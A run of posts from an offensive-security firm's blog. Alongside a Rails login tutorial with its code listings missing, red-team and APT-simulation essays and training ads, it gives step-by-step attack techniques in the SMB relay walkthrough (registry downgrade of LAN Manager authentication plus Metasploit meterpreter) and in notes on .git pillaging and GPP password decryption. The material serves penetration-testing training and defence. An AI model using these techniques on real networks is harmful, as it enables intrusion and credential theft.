We are hosting two training's at the Attack Research Headquarters over the next few months. The first training is our Operational Post Exploitation class which will be January 29th-January 30th.

We have just added Offensive Techniques in February for an available training as well. We will be hosting the training February 26th-February 28th. More details can be found at our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge the interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this are please email training@attackresearch.com so that we can gauge interest.

Also, a small but important detail, please ensure within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0'

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'

Now........back to the series. So, we last left off where a login page was visible when browsing to your site but it didn't really do anything. Time to rectify that.

Within the Sessions controller, a create method was defined and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt method and call it using the "before_save" Rails method. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:

So when you see something like user = User.new and user.save you know that the encrypt_password method will be called by Rails prior to saving the user data because of the "before_save" definition on line 4.Now we have to add a few more things:

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception being "attr_accessor", which is a standard Ruby call that allows an object to be both a getter & setter.

Okay, now let's see what it looks like.

Alright, so now we have a login page that does something but we need to create users. For this application's purpose, we are going to allow user's to signup. Let's provide a link for this purpose on the login page and even further, let's create a navigation bar at the top. We want this navigation bar visible on every page visited by the user. Easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (navigation bar, for example).

Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter-Bootstrap, one important thing to note is the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter-Bootstrap defined style.

The logic portion, the portion that belongs to Ruby and Rails, are Lines 13 -18. Effectively we are asking if the user (current_user) visiting the page is authenticated (exists), if they are (do exist), show a link to the logout path. Otherwise, render a login and signup path link.

You are probably wondering where link_to and current_user come from. Rails provides built-in methods and you'll notice, in the views, they are typically placed between <%= and %>. So, link_to is a built in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

Located at /app/controllers/application_controller.rb

Notice on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the view, we have annotated it as a helper_method on line 4.

The next thing we need to do now is actually make the signup page. First, let's modify the attributes that are mass assignable via attr_accessilbe in the user model file.

Next, review the users_controller.rb file and add the methods new & create. When new is called, instantiate a new blank User object (@user). Under the create method, we can modify a new user element leveraging the parameters submitted by the user (email, password, password_confirmation) to create the user.

Explanation of the Intended Flow -

User clicks "signup" and is sent to /signup (GET request).

User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb.

Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users.

The POST request to /users translates to the "create" action within the "user" controller.

Now, obviously we are missing something.....we need a signup page! Let's code that up under new.html.erb.

/app/views/users/new.html.erb

The internals of Rails and how we are able to treat @user as an enumerable object and create label tags and text field tags might be a little too complicated for this post. That being said, basically, the @user object (defined in the User controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look like something like user[email] and user[password_confirmation], for example. Here is what the actual request looks like in Burp...

Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so, now we have registered a user. The last piece here is to have a home page to view after successful authentication and also code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path as well as create a destroy method which callsthe Rails method "reset_session" and redirects the user back to the root_url. Also, remove the content within the index action under the home controller.

People often try to draw analogies between computer security and the military or warfare. Lets put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?" And the answer I believe is training, drilling and exercising. They don't spend the vast majority of their time in heated battle. In fact only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not do they spend most of their time training, exercising and practising for future incidents? If not why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary much like the Airforce Aggressor Squadrons.

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits and real attackers do not. Attackers either use 0days, complex configuration/design issues or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best methods to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc. This sort of ongoing training is more expensive than penetration testing for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:Adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to appear like a specific attacker's behaviour such as a beacon which non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive in a cd sized chunk using a non-english language version of winrar and a password captured from an incident response event. The team searches out, identifies and compromises, systems, users and data of interest. Each drill may have a different target such as PCI, engineering related intellectual property, executive communications.

Day 4:

Finally the team ex-filtrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise. The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc. Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter if not once a month then your soldiers are untrained and likely to get slaughtered when its time for the real battle.

Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn’t stop you from being able to replay the hash to another host and get a shell – at least, it doesn’t stop you as long as the host isn't speaking NTMLv2! By default, Vista and up send NTMLv2 response only for the LAN Manager authentication level. This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research looking into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key. This happens on the fly; there are no reboots, logon/logoff's, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing this the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.

This registry key is targeting the following path: HKLM\SYSTEM\CurrentControlSet\Control\Lsa.If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set to as low as it will go, we can capitalize on this.

Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:

Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt authentication to our bounce through the host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching at the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.

For brevity’s sake, we will just go ahead and simulate this activity by simply typing the following in the run dialogue box on the first victim host: (192.168.0.14) \\192.168.0.15\share\image.jpg.

I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This attempt of authentication actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large scale attacks, or something along those lines, it is best to have a full UNC path. Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.

This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques is a class based on trying to show people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures. Offensive Techniques has various sections in it that we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.The goal of our training is to get you out of the mindset of traditional pen testing and show students how real offensive attacks really happen. We are hoping these types of concepts spread to the whole industry. When this happens we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in training that we released yesterday or have questions please visit our site or email us at training@attackresearch.com with any questions.

People tend to focus on various areas as being important for computer security such as memory corruption vulnerabilities, malware, anomaly detection, etc. However the lurking and most critical issue in my opinion is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site we find that we have to have the following skills:

1. Soft skills. (often most important) The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer staff, culture and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore, showing up with a blue mohawk, a spike in the forehead and leather pants, not a team player, cussing and surfing porn on the customers system doesn't cut it no matter how good you are technically. If you are that guy then you get to stay in the lab and I guarantee you will make far less money. Even if you can write ASLR bypass exploits and kernel rootkits.

2. Document. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you cant clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, layed out so that an executive can understand it and so that the other security firm the customer hires to validate your results doesn't make fun of you.

4.) Reverse Engineering. This means disassembling binaries in IDA, running binaries in a debugger such as Ollydbg, WinDBG, IDA, memory forensics, and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page check summing? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5.) Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly and another dozen languages, at least well enough to look up APIs, understand standard libraries, discover which imports are important.

6.) Operating systems. You should know the ins and outs including file systems, memory management, kernel, library system and key command line tools of at least half a dozen OS's, especially as they are used in enterprise environments. Domains, NFS, NIS, kerberos, LDAP. So not only windows, linux and OS X, but also solaris, AIX and some embedded or mobile systems.

7.) Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely and test on the customers particular environment. You have to be able to take it apart, analyse the shellcode, understand everything its doing and re-write your own version of it.

8.) Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum enough technical base knowledge to use whatever tool is put in front of you. Examples include wireshark, splunk, fireeye, netwitness, arcsight, tippingpoint, snort / sourcefire, bluecoat, websense, TMI, Encase.

All of the members of your team whether you are a consulting shop or an internal incident response team need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist, they are unicorns. Those who can do this are either already employed, well payed and tackling more interesting problems than you can offer, or they are running/partners in their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and are charging close to high powered lawyer hourly rates. (when people question rates I point out that big name IR shops are around $400/hr and even the BestBuy geek squad charges $120/hr to reload your OS).

A lot of big contractors are trying to approach security like they did IT in the 90s and 00's. Bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a windows server relatively quickly, the above list of skills takes a decade + to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above 1.) Value freedom highly and don't want to work 9 to 5 in a cube farm and 2.) Don't want to live or work long periods of time onsite where you are. They don't want to live in Houston or in Cleaveland or in Indianapolis or probably even in the DC area. They want to live in La Jolla and San Francisco and New York and someone, somewhere is willing to pay them a lot to do it, and probably do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java and that's about it. You might luck out and get a good RIT, Georgia Tech, New Mexico Tech student who knows more but most likely these have already been recruited to the government or somewhere else. And the learning curve time is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city you will fail.

On the security company side you have the same problem, no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels) hire whatever they can find and field them. This continues the trend in mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying out is to focus on buying appliances and contracting pro services to set them up and hope that automation can solve the problem. It cannot. Here is a perfect example. A customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out and at first glance it looked very bad. It had all the classic signs of an exploit, heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular autocad type program generated legitimate PDFs that looked this way. This is something that is not automatible. You must have an experienced and skilled analyst to do this. No amount of rack mount, fancy logo appliances will help you. And the bigger your enterprise the more you need. Every enterprise block of 30 - 50k IPs needs a team of 5 - 10 people.

Which leads me to the next issue. How you perceive your staffing resources. Example: One company I saw told they had a staff of 12 analysts to deal with security detection and response. I thought wow pretty good! Lets break the team down:

A manager, full time in meetings, paperwork, etc.

An assistant to the manager, secretarial work, etc.

3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts

5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis

1 Developer mostly focused on designing queries and interfaces for the tools.

1 Actual analyst.

While management believes they have 12 people and doesn't understand why things take so long they actually have 1 person. This situation is very common in big companies. 1 good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security. What is the solution? Some would say training, but lets be honest, were you back home writing rootkits for work after taking Hoglund and Butler's class at Blackhat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2 day - 1 week course isn't doing it. Going through the entire SANS curriculum isn't doing it and CISSP sure as hell isn't doing it.

You have to spend around 6hrs a day, after work, highly focused on coding, reversing, etc. for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big name researchers and best staff does it, and unfortunately you only need a couple of attackers for every 10 defenders out there.

Worth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php/** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information by * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */

// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define('DB_NAME', 'site_wordpress');

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:

I needed to make a map the access points for a client. Since i cant show that map, i made another using the same technique.First take your handy dandy Android device and install Wigle Wifi Wardriving.It uses the internal GPS and wifi to log access points, their security level and their GPS Position.looks like this (yup i stole these)List of access pointsAlso makes a cute map on your phoneonce you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.All Access PointsOpen Access PointsWEP Encrypted Access PointsThat's it.-CG

In the last post, Basics of Rails Part 1, we created and ran the Rails application "attackresearch". Next, we will change the Web Server to Unicorn as well as introduce the concept of Rake.

Something to note, Rails typically is run in three modes:

Test - Mode typically used for Unit Tests.

Development - Development environment, includes verbose errors and stack traces.

Production - Settings are as if you were running in this application in a production environment.

The default mode of running Rails locally on your machine is, development mode. Also, any command you enter will be run in the context of the development mode. This means both Rake tasks and Rails commands alike and also holds true for the Rails console which, can be your best friend.

Now obviously, if you've done something custom like `export RAILS_ENV=production` this would be different. Additionally, explicitly casting the mode in which something like the Rails console runs (example: rails console production) will change the default behavior or mode, rather.

What does all this mean? Well, really it means that you want to develop in development mode and run a production application in production mode. Pretty simple huh?

Time to configure for Unicorn versus the default Webrick web server. If you are asking yourself "why", the answer is fairly straightforward. Unicorn is meant for production and handles a large amount of requests better and overall, is more configurable. For the purposes of this tutorial, we will use Unicorn for both development and production.

I want to demonstrate two ways of doing this. The first is by using a startup shell script. The other, for the purposes of an introduction to Rake tasks, will be to actually create a Rake task to start the application in lieu of a shell script.

Startup shell file:

Modify your Gemfile by uncommenting the line with the Unicorn gem. Also, while we are at it, let's uncomment the Bcrypt gem as well:

Run `bundle install`:

Make the startup script executable and fire it up:

The line `rvmsudo bundle exec unicorn $*` means...

rvmsudo - Allows you to run sudo commands while maintaining your RVM environment.

bundle exec = Directs bundler to execute the program which, automatically 'require'(s) all the gems in your Gemfile.

unicorn - Unicorn service.

$* - Any arguments passed to the script will be executed as part of the command inside of the script. Example: ./start.sh -p 4444 translates to - `rvmsudo bundle exec unicorn -p 4444` and would start the server on port 4444.

Alternatively, we can just easily package this up as a Rake task. A Rake task is a repeatable task that can be executed using the `rake` command. Nothing magical, it just harnesses Ruby goodness to convert your task definitions into an executable command.There is an excellent tutorial on Rake available via the Railscasts site. For our purposes, let's create a Unicorn rake file. Do this under /lib/tasks and use the `.rake` extension.Presumably, you may wish to have multiple tasks available to the Unicorn namespace. For instance, if you'd like to both start and stop the Unicorn service it would be beneficial to create a namespace titled "unicorn" with multiple tasks inside it. For the purposes of this tutorial, I will only cover building a start task as you can easily expand upon this. Also, since we are running the Unicorn service in an interactive mode, you can hit ctrl+c to stop it. I would like to note that having a start and stop task is very beneficial if you are running Unicorn detached (non-interactive), where the service runs in the background.Moving along, here is the task...Lines 1 & 9 - Begin and end the unicorn namespace definition.Line 3 - Describe the task (useful at the console).Line 4 - Define the task with the first argument "task" and any additional definitions (comma separated) are arguments. In this example, we except a port argument. Line 5 - We code some logic that says, port_command will equal either an empty string or "-p <port number>" and if a port number is not provided (nil) it will equal an empty string.Line 6 - This is a shell command that appends the result of port_command to `rvmsudo bundle exe unicorn`.Let's list our tasks and see if it is available:Success! Notice how the description and command format are auto-magically taken care of for you.'You can run this in one of two ways.`rake unicorn:start[4444]` (starts the Unicorn service on port 444) OR....`rake unicorn:start` (starts it on the default port, 8080)

To recap, we've shifted off of Webrick and over to Unicorn. Also, we've introduced the concept of a Rake task.Stay tuned for more parts in this series...~cktricky

Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

I was reading an article recently about how some of the sterilization requirements in factory farms actually encourage more damaging infections which then led me to think about antibiotic resistant strains of diseases popping up due to overuse of antibiotics. This finally led me to think about similarities in computer security.

Since I started officially working in security around 1996 a number of us have suffered from a Cassandra complex; providing warnings and gloomy predictions, which have usually come true, and being generally ignored. Now, over a decade later, it's too late to do some of what we should have done back then. Everything is owned. We have to retrofit now instead of building security in from the ground up. Its MUCH more expensive and difficult today than if we would have started then.

One of those predictions I was making back in the early 2000's was the following:

We should move away from standardized IT environments where everything is centralized and the same

We should stop trying so hard to stop the 80% of low sophistication attackers and focus on the 20% of attackers we really care about and who can really hurt us

Recently I have been doing a lot of incident response work and every organization I have dealt with is suffering from bullet number one. Everything centrally authenticates, everyone is running the same OS image, usernames are conventionalized and standardized, networks are flat and everything is hacked. I consistently see an attacker take over an entire network because once they had 1 machine, they had them all. Does a scientist need the same environment as a secretary? Should the sales department windows desktop be able to touch the production SQL database? Don't know, don't care, everyone gets the standard image. (And the spread of an attack is massively higher)That the industry has tried hard to solve the low hanging 80% attacks is obvious from looking at the "solutions" that are provided such as IDS, AV, Firewalls, failure logging, scan-exploit-report penetration tests etc. These have done a decent job of stopping scans, worms and mass malware for the most part and have failed miserably at stopping the remaining 20%. So why is this a problem? 80% is pretty good right? Well lets look at what the differences between the two types of attackers are:80%

Goals

Might steal your SSN or CC

Might use your system as a bot in a DDOS

Might redirect you to advertisements

Might strip your WoW character

Might deface your website / embarrass you

Techniques

Mass scans

1day exploits (often available patch)

Exploiting poor web coding

SQLinjection

Mass malware

20%

Goals

Will try to steal your intellectual property and us it for strategic advantage

Will gather intelligence against you to gain an edge in negotiations, legislation, bids, etc.

Will destroy the master boot record of all your desktops to financially damage your country

Will use you to attack your customers to achieve the above

Will steal your source code to find 0day, insert backdoors or sell it to competitors

Techniques

0day

Targeted spear phishing

Sophisticated post exploitation & persistence

Covert channels

Anti-analysis & evasion

Malicious insiders, supply chain, implanted hardware

Mass data exfiltration

Crypto key stealing

Trust relationship hijacking

So what we have effectively done is build an environment where all target hosts are uniformly the same, and ensure that the only "germs" who can get in are the ones who we can't detect, can't stop and can't deal with. Superbugs. Whats worse is the more we get compromised and hurt by the 20% the more money and resources we throw at trying to solve the 80% and the more we put our head in the sand about the attackers that really want to hurt us and are good at doing it. We've pushed the motivated attackers way from using the easy to deal with techniques towards the ones we can't solve very well and are very expensive.There are a few possible solutions:

Build active response capabilities (offense). This is messy and will cause a lot of problems but no one ever won a war with high walls and defense only. (Maginot line?)

Start throwing money and resources at the 20% problem. PCI is not going to do it. Compliance pen tests are not going to do it. Researching virtualizing every process, location aware document formats, degradation of service for anomalous connections, better intelligence, data sharing and correlation, in short making it increasingly expensive for the sophisticated attacker is what we should be looking at.

We have to stop popping antibiotics and figure out how to cut out the flesh eating bacteria.V.

Today I wanted to talk a bit more about APTSim. We all know by now that the bad guys always get in. Especially determined, well funded and well equipped attackers. We know roughly HOW they are getting in which is usually via a targeted Phish, SQLinjection, malicious URL, etc. Things that are hard to defend against because they depend on a human element or trust partnerships between organizations.

What we don't think about is the fact that our Incident Response and detection teams don't get exercised sufficiently (or ever) which makes them much less effective than they could be. We also don't think about modeling and understanding what real attack traffic looks like so we can tune our defenses against it. REAL traffic, not Nessus scans or CoreImpact exploits.

How can we know that our people and systems are actually able to detect the types of attacks we really care about if we don't know what each attack looks like in every data source we have. Is there a windows event log entry reflecting a change in service permissions? Can the timing pattern in the call home beacon be seen in net flow? What does an exfil file hidden in the recycle bin via user SID look like, and is it visible?

If you know all the malicious inputs to the system ahead of time, then you can determine all the data sources you have that show indicators that something has happened, rather than waiting until an attack happens to attempt to track it all back and hope for the best.

This subject is a bit more tricky so lets approach it first with an example. Using HERMES, we analyzed some samples and activity from a group of APT actors that we call "UPS". The typical UPS attack performed the following activities (this information was compiled from IR activity and shared data from other victims):

Generate a particularly timed beacon that communicates over HTTP

Drop the command line Chinese language version of winrar on the target

Replace sticky keys with cmd.exe for persistence and access via RDP

Turn on RDP if it's not already enabled

Index and archive all office documents, compress and encrypt them with RAR and a specific password and store them in the recycle bin

Enable the support_388945a0 account and add it to the local admin group

Exfiltrate the data encoded over port 443 (but not SSL)

Setup an insecure service for persistence / privilege escalation

That is a fairly comprehensive list of attacker activity and each action generates either specific network traffic, log entries, and files on the target. So what we do with APTSim is to take all the above information and create a piece of pseudo-malware that takes the same actions, except in a safe and controlled manner, and includes cleanup components so it can be removed when the exercise is complete.

Customers have different preferences as to how we take the next step but generally one of a few options is commonly used:

AR has VPN access to the customer network

AR has shipped a special box which the customer plugs into their network

AR conducts a physical penetration to launch the APTSim via a malicious USB key, custom developed Teensy, or other hardware implanted in customer equipment

AR generates a targeted phish mirroring the initial vector used by the original actors whether that's a malicious attachment or a URL, etc.

The customer executes the APTSim model themselves

The APTSim model then connects back to our command & control center, takes all the same actions as the real attacker, exfiltrates data and then the customer is notified of what activity took place. The notification is a short document contains log entry examples, PCAP examples, time and dates, ports used, in short everything that is needed to detect the activity as well as track it back post event.

If the attack simulation is not detected then AR will assist you in tuning your defenses whether that means new rules for your Cisco ASA's, custom ClamAV or Snort signatures, specialized Splunk apps, etc.

Rather than a barely useful once a year event, this process is ongoing, monthly or as new attacks are found and analyzed. When one of the organizations in your business sector is hit, within a very short period of time you know the crucial details of the attack, are tested to see if it could hit you as well, and finally are ready to defend before the attackers come for you. This is being proactive rather than reactive.

As a follow up to yesterday's post I would like to talk a bit more about HERMES and how it works.

INITIAL KNOWLEDGE - First there there is some form of information that comes in indicating a potential attack. This information usually has some trackable piece of information such as an email address, subject line, content, an md5 sum, etc. This information usually comes in one of the following methods:

Law enforcement notification

Incident Response/forensics post compromise information

A detection system picks up an attack (rare)

Specialized sourcing (AR gathers targeted attack tools, malware and other indicators using a variety of means including IR and direct sharing)

What's special about the above is that HERMES uses your standard build image rather than a generic XP VM, the way maliciousness is determined, and some of the memory work we do. Also the fact that the AV scans (unlike sites such as VirusTotal, Jotti, etc.) do not submit your sensitive samples to AV vendors is fairly unique.CORRELATION - Most organizations track incidents over time via a notebook, a wiki or most commonly a white board. HERMES allows you to identify relationships between attacks over time.

Incident Tracking

Analyst Notes

Actor/attribution Information

Relations between IOCs on different samples or cases

There are several ways in which HERMES is already benefiting our clients and options how it may benefit you:

HERMES can be delivered as an appliance to supplement or provide your reverse engineering and incident tracking operations

HERMES can be delivered as an ESXi implementation which can fit easily into your existing virtualized environment

Finally AR can provide organizations with HERMES targeted threat intel reporting or be operated by AR staff for you. Results can be provided as a XML feed, PDF, etc.

All of this information is fed into APTSim models to ensure that ongoing testing mirrors actual current targeted attack techniques and grows in sophistication over time in sync with the attackers. This information is also used to generate your IDS, AV, Splunk and other defensive signatures.Rather than focusing on the entire set of malware, for which there are millions upon millions of samples, HERMES focuses on a handful of sophisticated, targeted attack tools which are in use over the last 30 days or less. Most security tools are designed to deal with the 80% of attacks such as botnets, scans, mass malware, etc. But its the other 20% that you should care about because those are the ones that are intentionally (and successfully) damaging your business and that you have no defense against. This is something you can get your hands around with a tool like HERMES.On the next post I will talk a bit more about APTSim and how it works.As always, hit up info [at] attackresearch.com for more information.V.

We all know by now that most of today's defenses are designed to defend against auditors and penetration testers. We also know that penetration tests do not reflect what today's attackers actually do.

AR has decided to try to address this problem and change the way active defense security is currently done. This diagram roughly represents the current process.

At each stage of the current process there is a problem.

* Vendor signatures are broad and cover millions of threats, exploits and malware, causing tons of false positives and can only detect what is broadly "known".

* Penetration testing only occurs once or twice a year and is essentially patch verification at this point.

* Patching does nothing against 0days, configuration and design flaws or lateral attack with valid credentials.

* Real attacks are not being prevented or detected and few organizations have what's needed to address the problem once they have been compromised.

* Attackers change IPs constantly, its a solved problem for them.

* Orgs are buying every tool out there but have no qualified staff to implement and maintain them.

Here is AR's proposed process:

NOTE: We must give a nod here to Mandiant and their IOC concept, which is brilliant.In this process HERMES covers the first three points. HERMES performs ongoing intelligence collection of APT tools and activities. HERMES also conducts automated dynamic, static, network, and forensic analysis which in turn generates reports, indicators of compromise and defensive signatures. Unlike other products, HERMES can use your companies standard build image for dynamic testing, so you know exactly how the threat affects your environment rather than just a stock WinXP or Win7 image. HERMES replaces much of the expensive and time consuming reverse engineering process.AR analysts then add in notes concerning actors, victim industries, targeted data, etc. Finally HERMES back end big data system provides correlation so you can see and track connections between attacks, actors, malware and IP a year ago and attacks today. Once the defenses for these highly tactical, targeted IOCs have been put into place, APTSim comes into play. AR takes the tools and techniques used by APT actors and creates custom applications that do exactly what they do. We SIMULATE the exact APT attack, seen elsewhere against your colleagues and competitors, in your environment to assure you don't fall victim to it as well. These tools are run on your network, in an ongoing, subscription basis rather than a monolithic once a year event. AR provides your security and IT staff with frequent, small 1-3 page APTSim notifications of what was done, when, how, how it should have been detected and all the information necessary to detect it in the future if it wasn't. This is in stark contrast to the 40 page "here is what isn't patched" reports that traditional penetration tests generate.All if this means that your organization is in an ongoing circular process of constantly being notified, defended and tested against up to the minute APT attacks, rather than simply scanned and exploited for old memory corruption and XSS bugs.If you are an organization who has suffered losses from targeted attacks, are wrestling with staffing problems, and know your expensive defenses have proven inadequate, this is what you have been looking for.

